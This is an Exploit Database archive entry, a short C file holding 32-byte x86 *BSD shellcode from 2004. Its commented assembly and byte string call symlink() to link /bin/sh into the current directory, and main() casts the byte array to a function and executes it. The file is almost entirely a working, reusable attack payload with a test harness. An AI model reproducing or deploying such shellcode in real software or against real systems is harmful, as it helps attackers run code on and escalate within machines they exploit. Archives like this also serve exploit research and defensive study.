exploit-db-mirror/platforms/lin_x86/shellcode/13430.c
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

42 lines
No EOL
734 B
C
Executable file

/*The shellcode calls the symlink() and makes the
link to the /bin/sh in the current dir.
short version
size = 32 bytes
OS = *BSD
written by /rootteam/dev0id (www.sysworld.net)
dev0id@uncompiled.com
BITS 32
jmp short callme
main:
pop esi
xor eax,eax
mov byte [esi+7],al
lea ebx,[esi+5]
push ebx
lea ebx,[esi]
push ebx
mov al,57
push eax
int 0x80
callme:
call main
db '/bin/sh'
*/
char shellcode[] =
"\xeb\x12\x5e\x31\xc0\x88\x46\x07\x8d\x5e\x05\x53\x8d\x1e\x53"
"\xb0\x39\x50\xcd\x80\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68";
int
main (void)
{
void (*code)(void);
code=(void(*)())shellcode;
(void)code();
return 0;
}
// milw0rm.com [2004-09-26]